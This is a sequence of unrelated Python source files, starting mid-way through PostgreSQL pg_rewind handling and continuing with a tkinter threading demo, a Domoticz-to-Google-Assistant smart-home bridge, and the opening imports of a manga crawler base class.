waldir, wal_filename = line[b:e].rsplit('/', 1)
if waldir.endswith('/pg_' + self._postgresql.wal_name) and len(wal_filename) == 24:
return wal_filename
def pg_rewind(self, r):
# prepare pg_rewind connection
env = self._postgresql.config.write_pgpass(r)
env.update(LANG='C', LC_ALL='C', PGOPTIONS='-c statement_timeout=0')
dsn = self._postgresql.config.format_dsn(r, True)
logger.info('running pg_rewind from %s', dsn)
restore_command = self._postgresql.config.get('recovery_conf', {}).get('restore_command') \
if self._postgresql.major_version < 120000 else self._postgresql.get_guc_value('restore_command')
# currently, pg_rewind expects postgresql.conf to be inside $PGDATA, which is not the case on e.g. Debian
# Fix this logic if e.g. PG15 receives an update for pg_rewind:
pg_rewind_can_restore = self._postgresql.major_version >= 130000 \
and restore_command \
and self._postgresql.config._config_dir == self._postgresql.data_dir
cmd = [self._postgresql.pgcommand('pg_rewind')]
if pg_rewind_can_restore:
cmd.append('--restore-target-wal')
cmd.extend(['-D', self._postgresql.data_dir, '--source-server', dsn])
while True:
results = {}
ret = self._postgresql.cancellable.call(cmd, env=env, communicate=results)
logger.info('pg_rewind exit code=%s', ret)
if ret is None:
return False
logger.info(' stdout=%s', results['stdout'].decode('utf-8'))
logger.info(' stderr=%s', results['stderr'].decode('utf-8'))
if ret == 0:
return True
if not restore_command or pg_rewind_can_restore:
return False
missing_wal = self._find_missing_wal(results['stderr']) or self._find_missing_wal(results['stdout'])
if not missing_wal:
return False
if not self._fetch_missing_wal(restore_command, missing_wal):
logger.info('Failed to fetch WAL segment %s required for pg_rewind', missing_wal)
return False
def execute(self, leader):
if self._postgresql.is_running() and not self._postgresql.stop(checkpoint=False):
return logger.warning('Can not run pg_rewind because postgres is still running')
# prepare pg_rewind connection
r = self._conn_kwargs(leader, self._postgresql.config.rewind_credentials)
# 1. make sure that we are really trying to rewind from the master
# 2. make sure that pg_control contains the new timeline by:
# running a checkpoint or
# waiting until Patroni on the master will expose checkpoint_after_promote=True
checkpoint_status = leader.checkpoint_after_promote if isinstance(leader, Leader) else None
if checkpoint_status is None: # we are the standby-cluster leader or master still runs the old Patroni
# superuser credentials match rewind_credentials if the latter are not provided or we run 10 or older
if self._postgresql.config.superuser == self._postgresql.config.rewind_credentials:
leader_status = self._postgresql.checkpoint(
self._conn_kwargs(leader, self._postgresql.config.superuser))
else: # we run 11+ and have a dedicated pg_rewind user
leader_status = self.check_leader_has_run_checkpoint(r)
if leader_status: # we tried to run/check for a checkpoint on the remote leader, but it failed
return logger.warning('Can not use %s for rewind: %s', leader.name, leader_status)
elif not checkpoint_status:
return logger.info('Waiting for checkpoint on %s before rewind', leader.name)
elif not self.check_leader_is_not_in_recovery(r):
return
if self.pg_rewind(r):
self._state = REWIND_STATUS.SUCCESS
elif not self.check_leader_is_not_in_recovery(r):
logger.warning('Failed to rewind because master %s become unreachable', leader.name)
else:
            logger.error('Failed to rewind from healthy master: %s', leader.name)
for name in ('remove_data_directory_on_rewind_failure', 'remove_data_directory_on_diverged_timelines'):
if self._postgresql.config.get(name):
logger.warning('%s is set. removing...', name)
self._postgresql.remove_data_directory()
self._state = REWIND_STATUS.INITIAL
break
else:
self._state = REWIND_STATUS.FAILED
return False
def reset_state(self):
self._state = REWIND_STATUS.INITIAL
with self._checkpoint_task_lock:
self._checkpoint_task = None
@property
def is_needed(self):
return self._state in (REWIND_STATUS.CHECK, REWIND_STATUS.NEED)
@property
def executed(self):
return self._state > REWIND_STATUS.NOT_NEED
@property
def failed(self):
return self._state == REWIND_STATUS.FAILED
def read_postmaster_opts(self):
"""returns the list of option names/values from postgres.opts, Empty dict if read failed or no file"""
result = {}
try:
with open(os.path.join(self._postgresql.data_dir, 'postmaster.opts')) as f:
data = f.read()
for opt in data.split('" "'):
if '=' in opt and opt.startswith('--'):
name, val = opt.split('=', 1)
result[name.strip('-')] = val.rstrip('"\n')
except IOError:
logger.exception('Error when reading postmaster.opts')
return result
def single_user_mode(self, communicate=None, options=None):
"""run a given command in a single-user mode. If the command is empty - then just start and stop"""
cmd = [self._postgresql.pgcommand('postgres'), '--single', '-D', self._postgresql.data_dir]
for opt, val in sorted((options or {}).items()):
cmd.extend(['-c', '{0}={1}'.format(opt, val)])
# need a database name to connect
cmd.append('template1')
return self._postgresql.cancellable.call(cmd, communicate=communicate)
def cleanup_archive_status(self):
status_dir = os.path.join(self._postgresql.wal_dir, 'archive_status')
try:
for f in os.listdir(status_dir):
path = os.path.join(status_dir, f)
try:
if os.path.islink(path):
os.unlink(path)
elif os.path.isfile(path):
os.remove(path)
except OSError:
logger.exception('Unable to remove %s', path)
except OSError:
logger.exception('Unable to list %s', status_dir)
def ensure_clean_shutdown(self):
self.cleanup_archive_status()
# Start in a single user mode and stop to produce a clean shutdown
opts = self.read_postmaster_opts()
opts.update({'archive_mode': 'on', 'archive_command': 'false'})
self._postgresql.config.remove_recovery_conf()
output = {}
ret = self.single_user_mode(communicate=output, options=opts)
if ret != 0:
logger.error('Crash recovery finished with code=%s', ret)
logger.info(' stdout=%s', output['stdout'].decode('utf-8'))
logger.info(' stderr=%s', output['stderr'].decode('utf-8'))
return ret == 0 or None
|
tk2thread.py
|
import queue
import threading
import time
import tkinter
from tkinter import ttk
the_queue = queue.Queue()
def thread_target():
while True:
message = the_queue.get()
if message is None:
print("thread_target: got None, exiting...")
return
print("thread_target: doing something with", message, "...")
time.sleep(1)
print("thread_target: ready for another message")
def on_click():
the_queue.put("hello")
root = tkinter.Tk()
big_frame = ttk.Frame(root)
big_frame.pack(fill='both', expand=True)
ttk.Button(big_frame, text="Click me", command=on_click).pack()
threading.Thread(target=thread_target).start()
root.mainloop()
# we get here when the user has closed the window, let's stop the thread
the_queue.put(None)
|
smarthome.py
|
# -*- coding: utf-8 -*-
import hashlib
import json
import os
import re
import subprocess
import sys
import threading
import time
from collections.abc import Mapping
from itertools import product
import requests
import trait
from auth import *
from const import (DOMOTICZ_TO_GOOGLE_TYPES, ERR_FUNCTION_NOT_SUPPORTED, ERR_PROTOCOL_ERROR, ERR_DEVICE_OFFLINE,
TEMPLATE, ERR_UNKNOWN_ERROR, ERR_CHALLENGE_NEEDED, DOMOTICZ_GET_ALL_DEVICES_URL,
DOMOTICZ_GET_SETTINGS_URL, DOMOTICZ_GET_ONE_DEVICE_URL, DOMOTICZ_GET_SCENES_URL, groupDOMAIN,
sceneDOMAIN, CONFIGFILE, LOGFILE, lightDOMAIN, switchDOMAIN, blindsDOMAIN, pushDOMAIN, climateDOMAIN,
tempDOMAIN, lockDOMAIN, invlockDOMAIN, colorDOMAIN, mediaDOMAIN, speakerDOMAIN, cameraDOMAIN,
REQUEST_SYNC_BASE_URL,
REPORT_STATE_BASE_URL, securityDOMAIN, outletDOMAIN, sensorDOMAIN, doorDOMAIN, selectorDOMAIN,
fanDOMAIN, ATTRS_BRIGHTNESS, ATTRS_THERMSTATSETPOINT, ATTRS_COLOR_TEMP, ATTRS_PERCENTAGE, VERSION)
from helpers import (configuration, readFile, saveFile, SmartHomeError, SmartHomeErrorNoChallenge, AogState, uptime,
getTunnelUrl, FILE_DIR, logger, ReportState, Auth, logfilepath)
DOMOTICZ_URL = configuration['Domoticz']['ip'] + ':' + configuration['Domoticz']['port']
try:
logger.debug("Connecting to Domoticz on %s" % DOMOTICZ_URL)
r = requests.get(
        DOMOTICZ_URL + '/json.htm?type=command&param=addlogmessage&message=Connected to Google Assistant with DZGA v' + VERSION,
auth=(configuration['Domoticz']['username'], configuration['Domoticz']['password']), timeout=(2, 5))
except Exception as e:
logger.error('Connection to Domoticz refused with error: %s' % e)
try:
import git
repo = git.Repo(FILE_DIR)
except:
repo = None
ReportState = ReportState()
if not ReportState.enable_report_state():
logger.error("Service account key is not found.")
logger.error("Report state will be unavailable")
def checkupdate():
if 'CheckForUpdates' in configuration and configuration['CheckForUpdates'] == True:
try:
r = requests.get(
'https://raw.githubusercontent.com/DewGew/Domoticz-Google-Assistant/' + repo.active_branch.name + '/const.py')
text = r.text
if VERSION not in text:
update = 1
logger.info("========")
logger.info(" New version is availible on Github!")
else:
update = 0
return update
except Exception as e:
logger.error('Connection to Github refused! Check configuration.')
return 0
else:
return 0
update = checkupdate()
# Map a Domoticz device to the corresponding Google Assistant domain
def AogGetDomain(device):
if device["Type"] in ['Light/Switch', 'Lighting 1', 'Lighting 2', 'RFY']:
if device["SwitchType"] in ['Blinds', 'Blinds Inverted', 'Venetian Blinds EU', 'Venetian Blinds US',
'Blinds Percentage', 'Blinds Percentage Inverted']:
return blindsDOMAIN
elif 'Door Lock' == device["SwitchType"]:
return lockDOMAIN
elif 'Door Lock Inverted' == device["SwitchType"]:
return invlockDOMAIN
elif "Door Contact" == device["SwitchType"]:
return doorDOMAIN
elif device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return pushDOMAIN
elif 'Motion Sensor' == device["SwitchType"]:
return sensorDOMAIN
elif 'Selector' == device["SwitchType"]:
return selectorDOMAIN
elif 'Camera_Stream' in configuration and True == device["UsedByCamera"] and True == \
configuration['Camera_Stream']['Enabled']:
return cameraDOMAIN
elif 'Image_Override' in configuration and 'Switch' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Switch']:
return switchDOMAIN
elif 'Image_Override' in configuration and 'Light' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Light']:
return lightDOMAIN
elif 'Image_Override' in configuration and 'Media' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Media']:
return mediaDOMAIN
elif 'Image_Override' in configuration and 'Outlet' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Outlet']:
return outletDOMAIN
elif 'Image_Override' in configuration and 'Speaker' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Speaker']:
return speakerDOMAIN
elif 'Image_Override' in configuration and 'Fan' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Fan']:
return fanDOMAIN
else:
return lightDOMAIN
elif 'Group' == device["Type"]:
return groupDOMAIN
elif 'Scene' == device["Type"]:
return sceneDOMAIN
elif 'Temp' == device["Type"]:
return tempDOMAIN
elif 'Thermostat' == device['Type']:
return climateDOMAIN
elif 'Temp + Humidity' == device['Type']:
return tempDOMAIN
elif 'Temp + Humidity + Baro' == device['Type']:
return tempDOMAIN
elif 'Color Switch' == device["Type"] and "Dimmer" == device["SwitchType"]:
return colorDOMAIN
elif 'Color Switch' == device["Type"] and "On/Off" == device["SwitchType"]:
logger.info(device["Name"] + " (Idx: " + device[
"idx"] + ") is a color switch. To get all functions, set this device as Dimmer in Domoticz")
return lightDOMAIN
elif 'Color Switch' == device["Type"] and device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return pushDOMAIN
elif 'Security' == device["Type"]:
return securityDOMAIN
return None
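# Return the voice-control description configured for a scene/group or device in the configuration file.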
def getDesc(state):
if state.domain == sceneDOMAIN or state.domain == groupDOMAIN:
if 'Scene_Config' in configuration:
desc = configuration['Scene_Config'].get(int(state.id), None)
return desc
elif 'Device_Config' in configuration:
desc = configuration['Device_Config'].get(int(state.id), None)
return desc
else:
return None
def getDeviceConfig(descstr):
ISLIST = ['nicknames']
rawconfig = re.findall(r'<voicecontrol>(.*?)</voicecontrol>', descstr, re.DOTALL)
if len(rawconfig) > 0:
try:
lines = rawconfig[0].strip().splitlines()
cfgdict = {}
for l in lines:
assign = l.split('=')
varname = assign[0].strip().lower()
if varname != "":
if varname in ISLIST:
allvalues = assign[1].split(',')
varvalues = []
for val in allvalues:
varvalues.append(val.strip())
cfgdict[varname] = varvalues
else:
varvalue = assign[1].strip()
if varvalue.lower() == "true":
varvalue = True
elif varvalue.lower() == "false":
varvalue = False
cfgdict[varname] = varvalue
except:
            logger.error('Error parsing device configuration from Domoticz device description: %s', rawconfig[0])
return None
return cfgdict
return None
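# Build an AogState for a Domoticz device: map its domain and copy its state, levels and related settings.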
def getAog(device):
domain = AogGetDomain(device)
if domain is None:
return None
aog = AogState()
aog.name = device["Name"] # .encode('ascii', 'ignore')
aog.domain = domain
aog.id = device["idx"]
aog.entity_id = domain + aog.id
aog.state = device.get("Data", "Scene")
aog.level = device.get("LevelInt", 0)
aog.temp = device.get("Temp")
aog.humidity = device.get("Humidity")
aog.setpoint = device.get("SetPoint")
aog.color = device.get("Color")
aog.protected = device.get("Protected")
aog.maxdimlevel = device.get("MaxDimLevel")
aog.seccode = settings.get("SecPassword")
aog.secondelay = settings.get("SecOnDelay")
aog.tempunit = settings.get("TempUnit")
aog.battery = device.get("BatteryLevel")
aog.hardware = device.get("HardwareName")
aog.selectorLevelName = device.get("LevelNames")
aog.language = settings.get("Language")
if lightDOMAIN == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if outletDOMAIN == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if colorDOMAIN == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if colorDOMAIN == aog.domain and "RGBWW" == device["SubType"]:
aog.attributes = ATTRS_COLOR_TEMP
if climateDOMAIN == aog.domain and "Thermostat" == device["Type"]:
aog.attributes = ATTRS_THERMSTATSETPOINT
if blindsDOMAIN == aog.domain and "Blinds Percentage" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
if blindsDOMAIN == aog.domain and "Blinds Percentage Inverted" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
# Try to get device specific voice control configuration from Domoticz
# Read it from the configuration file if not in Domoticz (for backward compatibility)
desc = getDeviceConfig(device.get("Description"))
if desc is None:
desc = getDesc(aog)
if desc is not None:
n = desc.get('nicknames', None)
if n is not None:
aog.nicknames = n
r = desc.get('room', None)
if r is not None:
aog.room = r
ack = desc.get('ack', False)
if ack:
aog.ack = ack
report_state = desc.get('report_state', True)
if not ReportState.enable_report_state():
aog.report_state = False
if not report_state:
aog.report_state = report_state
if aog.domain == cameraDOMAIN:
aog.report_state = False
return aog
aogDevs = {}
deviceList = {}
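# Query Domoticz for devices (all, scenes, or a single idx) and refresh the aogDevs and deviceList caches.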
def getDevices(devices="all", idx="0"):
global aogDevs
global deviceList
url = ""
if "all" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ALL_DEVICES_URL + configuration['Domoticz'][
'roomplan'] + '&filter=all&used=true'
elif "scene" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_SCENES_URL
elif "id" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ONE_DEVICE_URL + idx
r = requests.get(url, auth=(configuration['Domoticz']['username'], configuration['Domoticz']['password']))
if r.status_code == 200:
devs = r.json()['result']
for d in devs:
aog = getAog(d)
if aog is None:
continue
aogDevs[aog.entity_id] = aog
req = {aog.name: {}}
req[aog.name]['idx'] = int(aog.id)
req[aog.name]['type'] = aog.domain
req[aog.name]['state'] = aog.state
req[aog.name]['nicknames'] = aog.nicknames
req[aog.name]['willReportState'] = aog.report_state
logger.debug(json.dumps(req, indent=2, sort_keys=False, ensure_ascii=False))
devlist = [(d.name, int(d.id), d.domain, d.state, d.room, d.nicknames, d.report_state) for d in aogDevs.values()]
devlist.sort(key=takeSecond)
deviceList = json.dumps(devlist)
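# Sort key helper: return the second element (the Domoticz idx) of a device tuple.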
def takeSecond(elem):
return elem[1]
def deep_update(target, source):
"""Update a nested dictionary with another nested dictionary."""
for key, value in source.items():
if isinstance(value, Mapping):
target[key] = deep_update(target.get(key, {}), value)
else:
target[key] = value
return target
settings = {}
def getSettings():
"""Get domoticz settings."""
global settings
url = DOMOTICZ_URL + DOMOTICZ_GET_SETTINGS_URL
r = requests.get(url, auth=(configuration['Domoticz']['username'], configuration['Domoticz']['password']))
if r.status_code == 200:
devs = r.json()
settings['SecPassword'] = devs['SecPassword']
settings["SecOnDelay"] = devs["SecOnDelay"]
settings['TempUnit'] = devs['TempUnit']
settings['Language'] = devs['Language']
logger.debug(json.dumps(settings, indent=2, sort_keys=False, ensure_ascii=False))
def restartServer():
"""Restart."""
logger.info(' ')
logger.info("Restart server")
logger.info(' ')
os.execv(sys.executable, ['python'] + sys.argv)
class _GoogleEntity:
"""Adaptation of Entity expressed in Google's terms."""
def __init__(self, state):
self.state = state
@property
def entity_id(self):
"""Return entity ID."""
return self.state.entity_id
def traits(self):
"""Return traits for entity."""
state = self.state
domain = state.domain
features = state.attributes
t = [Trait(state) for Trait in trait.TRAITS
if Trait.supported(domain, features)]
return t
def sync_serialize(self):
"""Serialize entity for a SYNC response.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
state = self.state
enableReport = ReportState.enable_report_state()
traits = self.traits()
# Found no supported traits for this entity
if not traits:
return None
if enableReport:
reportState = state.report_state
else:
reportState = enableReport
device = {
'id': state.entity_id,
'name': {
'name': state.name
},
'attributes': {},
'traits': [trait.name for trait in traits],
'willReportState': reportState,
'deviceInfo': {
'manufacturer': "Domoticz",
"model": state.hardware
},
'type': DOMOTICZ_TO_GOOGLE_TYPES[state.domain],
}
# use aliases
aliases = state.nicknames
if aliases:
device['name']['nicknames'] = aliases
# add room hint if annotated
room = state.room
if room:
device['roomHint'] = room
for trt in traits:
device['attributes'].update(trt.sync_attributes())
return device
def query_serialize(self):
"""Serialize entity for a QUERY response.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
state = self.state
# if state.state == STATE_UNAVAILABLE:
# return {'online': False}
attrs = {'online': True}
for trt in self.traits():
deep_update(attrs, trt.query_attributes())
return attrs
def execute(self, command, params, challenge):
"""Execute a command.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
executed = False
for trt in self.traits():
if trt.can_execute(command, params):
ack = self.state.ack # ack is now stored in state
pin = False
if configuration['Domoticz']['switchProtectionPass']:
protect = self.state.protected
else:
protect = False
if protect or self.state.domain == securityDOMAIN:
pin = configuration['Domoticz']['switchProtectionPass']
if self.state.domain == securityDOMAIN:
pin = self.state.seccode
ack = False
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'pinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('pin', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif True == protect and pin != challenge.get('pin'):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif self.state.domain == securityDOMAIN and pin != hashlib.md5(
str.encode(challenge.get('pin'))).hexdigest():
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
if ack:
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'ackNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('ack', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
trt.execute(command, params)
executed = True
break
if not executed:
raise SmartHomeError(ERR_FUNCTION_NOT_SUPPORTED,
'Unable to execute {} for {}'.format(command, self.state.entity_id))
def async_update(self):
"""Update the entity with latest info from Domoticz."""
if self.state.domain == groupDOMAIN or self.state.domain == sceneDOMAIN:
getDevices('scene')
else:
getDevices('id', self.state.id)
class SmartHomeReqHandler(OAuthReqHandler):
global smarthomeControlMappings
global aogDevs
def __init__(self, *args, **kwargs):
super(SmartHomeReqHandler, self).__init__(*args, **kwargs)
self._request_id = None
def report_state(self, states, token):
"""Send a state report to Google."""
data = {
'requestId': self._request_id,
'agentUserId': token.get('userAgentId', None),
'payload': {
'devices': {
'states': states,
}
}
}
ReportState.call_homegraph_api(REPORT_STATE_BASE_URL, data)
def smarthome_process(self, message, token):
request_id = self._request_id # type: str
inputs = message.get('inputs') # type: list
if len(inputs) != 1:
return {'requestId': request_id, 'payload': {'errorCode': ERR_PROTOCOL_ERROR}}
handler = smarthomeControlMappings.get(inputs[0].get('intent'))
if handler is None:
return {'requestId': request_id, 'payload': {'errorCode': ERR_PROTOCOL_ERROR}}
try:
result = handler(self, inputs[0].get('payload'), token)
return {'requestId': request_id, 'payload': result}
except SmartHomeError as err:
return {'requestId': request_id, 'payload': {'errorCode': err.code}}
except Exception as e:
logger.error(e)
return {'requestId': request_id, 'payload': {'errorCode': ERR_UNKNOWN_ERROR}}
def smarthome_post(self, s):
logger.debug(s.headers)
a = s.headers.get('Authorization', None)
token = None
if a is not None:
types, tokenH = a.split()
if types.lower() == 'bearer':
token = Auth['tokens'].get(tokenH, None)
if token is None:
raise SmartHomeError(ERR_PROTOCOL_ERROR, 'not authorized access!!')
message = json.loads(s.body)
self._request_id = message.get('requestId')
logger.info("Request " + json.dumps(message, indent=2, sort_keys=False, ensure_ascii=False))
response = self.smarthome_process(message, token)
try:
if 'errorCode' in response['payload']:
logger.info('Error handling message %s: %s' % (message, response['payload']))
except:
pass
s.send_json(200, json.dumps(response, ensure_ascii=False).encode('utf-8'), True)
logger.info("Response " + json.dumps(response, indent=2, sort_keys=False, ensure_ascii=False))
def smarthome(self, s):
s.send_message(500, "not supported")
def forceDevicesSync(self):
userAgent = self.getUserAgent()
enableReport = ReportState.enable_report_state()
if userAgent is None:
return 500 # internal error
data = {"agentUserId": userAgent}
if enableReport:
r = ReportState.call_homegraph_api(REQUEST_SYNC_BASE_URL, data)
elif 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE':
r = ReportState.call_homegraph_api_key(REQUEST_SYNC_BASE_URL, data)
else:
logger.error("No configuration for request_sync available")
return r
def syncDevices(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('sync'))
return
r = self.forceDevicesSync()
s.send_message(200, 'Synchronization request sent, status_code: ' + str(r))
def restartServer(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('restart'))
return
s.send_message(200, 'Restart request sent, status_code: True')
restartServer()
def settings(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('settings'))
return
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
message = ''
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
def settings_post(self, s):
enableReport = ReportState.enable_report_state()
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
if s.form.get("save"):
textToSave = s.form.get("save", None)
codeToSave = textToSave.replace("+", " ")
saveFile(CONFIGFILE, codeToSave)
message = 'Config saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("backup"):
codeToSave = readFile(os.path.join(FILE_DIR, CONFIGFILE))
saveFile('config/config.yaml.bak', codeToSave)
message = 'Backup saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("restart"):
message = 'Restart Server, please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
code = ''
logs = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
restartServer()
if s.form.get("sync"):
if 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE' or enableReport == True:
r = self.forceDevicesSync()
time.sleep(0.5)
if r:
                    message = 'Devices synchronized'
else:
message = 'Homegraph api key not valid!'
else:
message = 'Add Homegraph api key or a Homegraph Service Account json file to sync devices here!'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("reload"):
message = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("deletelogs"):
logfile = os.path.join(logfilepath, LOGFILE)
if os.path.exists(logfile):
f = open(logfile, 'w')
f.close()
logger.info('Logs removed by user')
message = 'Logs removed'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("update"):
repo.git.reset('--hard')
repo.remotes.origin.pull()
message = 'Updating to latest ' + repo.active_branch.name + ', please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
subprocess.call(['pip', 'install','-r', os.path.join(FILE_DIR, 'requirements/pip-requirements.txt')])
restartServer()
def delay_report_state(self, states, token):
time.sleep(3)
self.report_state(states, token)
def smarthome_sync(self, payload, token):
"""Handle action.devices.SYNC request.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
devices = []
states = {}
aogDevs.clear()
getDevices() # sync all devices
getSettings()
enableReport = ReportState.enable_report_state()
for state in aogDevs.values():
entity = _GoogleEntity(state)
serialized = entity.sync_serialize()
if serialized is None:
continue
devices.append(serialized)
if state.report_state:
try:
states[entity.entity_id] = entity.query_serialize()
except:
continue
if enableReport:
            threading.Thread(target=self.delay_report_state, args=(states, token)).start()
return {
'agentUserId': token.get('userAgentId', None),
'devices': devices,
}
def smarthome_query(self, payload, token):
"""Handle action.devices.QUERY request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
devices = {}
for device in payload.get('devices', []):
devid = device['id']
_GoogleEntity(aogDevs.get(devid, None)).async_update()
state = aogDevs.get(devid, None)
if not state:
# If we can't find a state, the device is offline
devices[devid] = {'online': False}
continue
e = _GoogleEntity(state)
devices[devid] = e.query_serialize()
return {'devices': devices}
def smarthome_exec(self, payload, token):
"""Handle action.devices.EXECUTE request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
entities = {}
results = {}
states = {}
enableReport = ReportState.enable_report_state()
for command in payload['commands']:
for device, execution in product(command['devices'],
command['execution']):
entity_id = device['id']
new_state = execution.get('params')
# Happens if error occurred. Skip entity for further processing
if entity_id in results:
continue
if entity_id not in entities:
if len(aogDevs) == 0:
getDevices()
getSettings()
state = aogDevs.get(entity_id, None)
if state is None:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': ERR_DEVICE_OFFLINE}
continue
entities[entity_id] = _GoogleEntity(state)
try:
entities[entity_id].execute(execution['command'], execution.get('params', {}),
execution.get('challenge', None))
except SmartHomeError as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code}
logger.error(err)
except SmartHomeErrorNoChallenge as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code,
'challengeNeeded': {'type': err.desc}}
logger.error(err)
final_results = list(results.values())
for entity in entities.values():
if entity.entity_id in results:
continue
entity.async_update()
# final_results.append({'ids': [entity.entity_id], 'status': 'SUCCESS', 'states': entity.query_serialize()})
final_results.append({'ids': [entity.entity_id], 'status': 'SUCCESS', 'states': new_state})
if state.report_state:
try:
# states[entity.entity_id] = entity.query_serialize()
states[entity.entity_id] = new_state
except:
continue
if state.report_state == True and enableReport == True:
self.report_state(states, token)
return {'commands': final_results}
def smarthome_disconnect(self, payload, token):
"""Handle action.devices.DISCONNECT request.
https://developers.google.com/assistant/smarthome/develop/process-intents#DISCONNECT
"""
return None
if 'userinterface' in configuration and configuration['userinterface'] == True:
smarthomeGetMappings = {"/smarthome": SmartHomeReqHandler.smarthome,
"/sync": SmartHomeReqHandler.syncDevices,
"/settings": SmartHomeReqHandler.settings,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/smarthome": SmartHomeReqHandler.smarthome_post,
"/settings": SmartHomeReqHandler.settings_post}
else:
smarthomeGetMappings = {"/smarthome": SmartHomeReqHandler.smarthome,
"/sync": SmartHomeReqHandler.syncDevices,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/smarthome": SmartHomeReqHandler.smarthome_post}
smarthomeControlMappings = {'action.devices.SYNC': SmartHomeReqHandler.smarthome_sync,
'action.devices.QUERY': SmartHomeReqHandler.smarthome_query,
'action.devices.EXECUTE': SmartHomeReqHandler.smarthome_exec,
'action.devices.DISCONNECT': SmartHomeReqHandler.smarthome_disconnect}
|
basemangacrawler.py
|
"""
An abstract base class for a Manga with Chapters.
"""
import os
import json
import shutil
import logging
from time import sleep
from typing import List, Any
from queue import Empty, Queue
from functools import lru_cache
from threading import Thread, Event
